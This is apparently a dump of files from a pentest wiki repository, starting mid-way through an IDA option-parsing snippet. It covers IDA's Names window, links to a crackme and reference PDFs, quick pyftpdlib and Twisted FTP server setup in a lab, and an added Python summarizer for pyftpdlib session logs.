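        print(example, "->", parse_instant_debugger(example))
    opts = collect_plugin_options(["-A", "-Odecomp:option1:option2:option3", "input-file"])
    print(opts, "->", get_plugin_options(opts, "decomp"))
```

Running the module prints the parsed form of each `-r` example from the Instant debugger section; the `-rl:password@mycom:4567+` line, for instance, yields `attach=True` with `pid=None`, which is the "show the process list and let the user pick" case the text describes.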

If there are several -O options in the command line, they will be concatenated with ':' between them.
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/The_Names_Windows.md:
--------------------------------------------------------------------------------

## The Names Window

The Names window provides a summary listing of all of the global names within a binary. A name is nothing more than a symbolic description given to a program virtual address. IDA initially derives the list of names from symbol-table and signature analysis during the initial loading of a file. Names can be sorted alphabetically or in virtual address order (either ascending or descending). The Names window is useful for rapidly navigating to known locations within a program listing. Double-clicking any Names window entry will immediately jump the disassembly view to the selected name.

Displayed names are both color and letter coded. The coding scheme is summarized below:

- **F** A regular function. These are functions that IDA does not recognize as library functions.
- **L** A library function. IDA recognizes library functions through the use of signature-matching algorithms. If a signature does not exist for a given library function, the function will be labeled as a regular function instead.
- **I** An imported name, most commonly a function name imported from a shared library. The difference between this and a library function is that no code is present for an imported name, while the body of a library function will be present in the disassembly.
- **C** Named code. These are named program instruction locations that IDA does not consider to be part of any function. This is possible when IDA finds a name in a program's symbol table but never sees a call to the corresponding program location.
- **D** Data. Named data locations typically represent global variables.
- **A** String data. This is a referenced data location containing a sequence of characters that conform to one of IDA's known string data types, such as a null-terminated ASCII C string.

--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/Keyfile.dat:
--------------------------------------------------------------------------------
GGGGGGGG
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.exe
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.idb
--------------------------------------------------------------------------------
/Reverse-Engineering/Reverse_Engineering_for_Beginners-en.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/Reverse_Engineering_for_Beginners-en.pdf
--------------------------------------------------------------------------------
/Reverse-Engineering/The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf
--------------------------------------------------------------------------------
/System-Services/README.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Services

How to install/manage system services?

# Links

1. https://gist.github.com/willurd/5720255
2. https://github.com/nixawk/bash-programming/tree/master/kali
--------------------------------------------------------------------------------
/System-Services/services/service-ftp.md:
--------------------------------------------------------------------------------

## How to set up an FTP server quickly

Please install [**pyftpdlib**](https://github.com/giampaolo/pyftpdlib) with pip or easy_install:

```
sudo easy_install pysendfile
sudo easy_install pyftpdlib
```

or

```
sudo pip2 install pysendfile
sudo pip2 install pyftpdlib
```

Once **pyftpdlib** is installed, start it as follows (the RuntimeWarning is expected: `-w` gives the anonymous user write access to the served directory):

```
root@lab:/tmp/pyftpdlib# python -m pyftpdlib -w -p 21
pyftpdlib/authorizers.py:240: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2016-03-06 10:00:11] >>> starting FTP server on 0.0.0.0:21, pid=2090 <<<
[I 2016-03-06 10:00:11] concurrency model: async
[I 2016-03-06 10:00:11] masquerade (NAT) address: None
[I 2016-03-06 10:00:11] passive ports: None
[I 2016-03-06 10:00:40] 192.168.1.103:52874-[] FTP session opened (connect)
[I 2016-03-06 10:00:40] 192.168.1.103:52874-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:00:45] 192.168.1.103:52874-[anonymous] FTP session closed (disconnect).
[I 2016-03-06 10:01:42] 192.168.1.101:49312-[] FTP session opened (connect)
[I 2016-03-06 10:02:12] 192.168.1.101:49312-[] FTP session closed (disconnect).
[I 2016-03-06 10:02:24] 192.168.1.101:49313-[] FTP session opened (connect)
[I 2016-03-06 10:02:31] 192.168.1.101:49313-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:06:28] 192.168.1.101:49313-[anonymous] RETR /tmp/pyftpdlib/setup.py completed=1 bytes=5183 seconds=0.004
[I 2016-03-06 10:07:29] 192.168.1.101:49313-[anonymous] FTP session closed (disconnect).
[I 2016-03-06 10:08:11] 192.168.1.104:1033-[] FTP session opened (connect)
[I 2016-03-06 10:08:17] 192.168.1.104:1033-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:10:43] 192.168.1.104:1033-[anonymous] FTP session closed (disconnect).
```

Windows FTP console client:

```
C:\Documents and Settings\test\Desktop>ver

Microsoft Windows XP [Version 5.1.2600]

C:\Documents and Settings\test\Desktop>ftp 192.168.1.103
Connected to 192.168.1.103.
220 pyftpdlib 1.5.0 ready.
User (192.168.1.103:(none)): anonymous
331 Username ok, send password.
Password:
230 Login successful.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
.ci
.coveragerc
.git
...
...
```

You can also use other clients, e.g. ncftp.
--------------------------------------------------------------------------------
/System-Services/services/twisted-ftp.md:
--------------------------------------------------------------------------------
## Twistd

How to start an FTP server with **Twisted**.

```
root@lab:/tmp# twistd -n ftp --help
Usage: twistd [options] ftp [options].
WARNING: This FTP server is probably INSECURE do not use it.
Options:
  -p, --port=            set the port number [default: 2121]
  -r, --root=            define the root of the ftp-site. [default:
                         /usr/local/ftp]
      --userAnonymous=   Name of the anonymous user. [default: anonymous]
      --help             Display this help and exit.
      --help-auth-type=  Show help for a particular authentication type.
      --auth=            Specify an authentication method for the server.
      --password-file=   Specify a file containing username:password login info
                         for authenticated connections. (DEPRECATED; see
                         --help-auth instead)
      --version          Display Twisted version and exit.
      --help-auth        Show all authentication methods available.

```

Install Twisted and start the server:

```
root@lab:/tmp# sudo easy_install twisted
root@lab:/tmp# twistd -n ftp -p 2121 --userAnonymous=anonymous
2016-03-06 11:24:24-0500 [-] Log opened.
2016-03-06 11:24:24-0500 [-] twistd 15.5.0 (/usr/bin/python 2.7.11) starting up.
2016-03-06 11:24:24-0500 [-] reactor class: twisted.internet.epollreactor.EPollReactor.
2016-03-06 11:24:24-0500 [-] FTPFactory starting on 2121
2016-03-06 11:24:24-0500 [-] Starting factory
```

--------------------------------------------------------------------------------
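A throwaway FTP server like the pyftpdlib one in service-ftp.md above is usually left running longer than planned, and its console log is the only record of what it served or, with `-w`, what was uploaded to it. The following Python is an added example written for this page, not code from pyftpdlib or from this wiki. It parses pyftpdlib log lines of the exact shape shown in that session (timestamp, `client:port-[user]`, message), groups them into sessions, totals the bytes downloaded per client and flags any write command. The embedded sample log is constructed: it copies the session lines from the page and adds one `STOR` line that is not on the page, so that the write flagging has something to catch; the assumption that pyftpdlib logs uploads with the same `completed=/bytes=` suffix as downloads is mine.

```python
"""Summarize a pyftpdlib session log: who connected, who logged in, what was
transferred, and which commands wrote to the server.  Added example; not code
from pyftpdlib or from the pentest-wiki page."""
import re
from collections import defaultdict

# Client lines look like:
# [I 2016-03-06 10:00:40] 192.168.1.103:52874-[anonymous] USER 'anonymous' logged in.
LINE_RE = re.compile(
    r"^\[(?P<level>[A-Z]) (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)-\[(?P<user>[^\]]*)\] (?P<msg>.*)$"
)
# Transfer completion lines: RETR /path completed=1 bytes=5183 seconds=0.004
XFER_RE = re.compile(r"^(?P<cmd>RETR|STOR|APPE) (?P<path>\S+) completed=(?P<ok>\d) bytes=(?P<bytes>\d+)")

# Commands that modify the served tree.  Worth flagging when the server was
# started with -w, because then the anonymous user is allowed to issue them.
WRITE_CMDS = {"STOR", "APPE", "DELE", "RNTO", "MKD", "RMD"}

# Constructed sample: the session lines from the page's log, plus one STOR line
# (constructed, not from the page) so that a write gets flagged.
SAMPLE_LOG = """\
[I 2016-03-06 10:00:11] >>> starting FTP server on 0.0.0.0:21, pid=2090 <<<
[I 2016-03-06 10:00:40] 192.168.1.103:52874-[] FTP session opened (connect)
[I 2016-03-06 10:00:40] 192.168.1.103:52874-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:00:45] 192.168.1.103:52874-[anonymous] FTP session closed (disconnect).
[I 2016-03-06 10:01:42] 192.168.1.101:49312-[] FTP session opened (connect)
[I 2016-03-06 10:02:12] 192.168.1.101:49312-[] FTP session closed (disconnect).
[I 2016-03-06 10:02:24] 192.168.1.101:49313-[] FTP session opened (connect)
[I 2016-03-06 10:02:31] 192.168.1.101:49313-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:06:28] 192.168.1.101:49313-[anonymous] RETR /tmp/pyftpdlib/setup.py completed=1 bytes=5183 seconds=0.004
[I 2016-03-06 10:07:29] 192.168.1.101:49313-[anonymous] FTP session closed (disconnect).
[I 2016-03-06 10:08:11] 192.168.1.104:1033-[] FTP session opened (connect)
[I 2016-03-06 10:08:17] 192.168.1.104:1033-[anonymous] USER 'anonymous' logged in.
[I 2016-03-06 10:09:02] 192.168.1.104:1033-[anonymous] STOR /tmp/pyftpdlib/upload.bin completed=1 bytes=2048 seconds=0.010
[I 2016-03-06 10:10:43] 192.168.1.104:1033-[anonymous] FTP session closed (disconnect).
"""


def parse_line(line):
    """Return the fields of one client line, or None for server-only lines."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def summarize(lines):
    """Group log lines into sessions keyed by (client ip, client port)."""
    sessions = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # banner / startup lines carry no client prefix
        key = (rec["ip"], int(rec["port"]))
        s = sessions.setdefault(key, {"opened": None, "closed": None, "user": None,
                                      "transfers": [], "writes": []})
        msg = rec["msg"]
        if msg.startswith("FTP session opened"):
            s["opened"] = rec["ts"]
        elif msg.startswith("FTP session closed"):
            s["closed"] = rec["ts"]
        elif msg.startswith("USER ") and msg.endswith("logged in."):
            s["user"] = rec["user"]
        else:
            x = XFER_RE.match(msg)
            if x:
                s["transfers"].append((x["cmd"], x["path"], int(x["bytes"]), x["ok"] == "1"))
            if msg.split(" ", 1)[0] in WRITE_CMDS:
                s["writes"].append(msg)
    return sessions


def bytes_served(sessions):
    """Bytes of completed downloads (RETR) per client IP."""
    totals = defaultdict(int)
    for (ip, _port), s in sessions.items():
        for cmd, _path, size, ok in s["transfers"]:
            if cmd == "RETR" and ok:
                totals[ip] += size
    return dict(totals)


def sessions_with_writes(sessions):
    """Client endpoints that changed something on the server."""
    return sorted(key for key, s in sessions.items() if s["writes"])


if __name__ == "__main__":
    sess = summarize(SAMPLE_LOG.splitlines())
    for (ip, port), s in sorted(sess.items()):
        print("%s:%d user=%s opened=%s closed=%s transfers=%d writes=%d"
              % (ip, port, s["user"], s["opened"], s["closed"], len(s["transfers"]), len(s["writes"])))
    print("bytes served:", bytes_served(sess))
    print("writers:", sessions_with_writes(sess))
```

On the page's own lines the summary shows four sessions, one of which (192.168.1.101:49312) never logged in, a single download of `setup.py` (5183 bytes) by 192.168.1.101, and, because of the constructed upload line, 192.168.1.104:1033 as the one client that wrote to the server. To run it over a real console log, pipe the saved output into `summarize(open(path).read().splitlines())`.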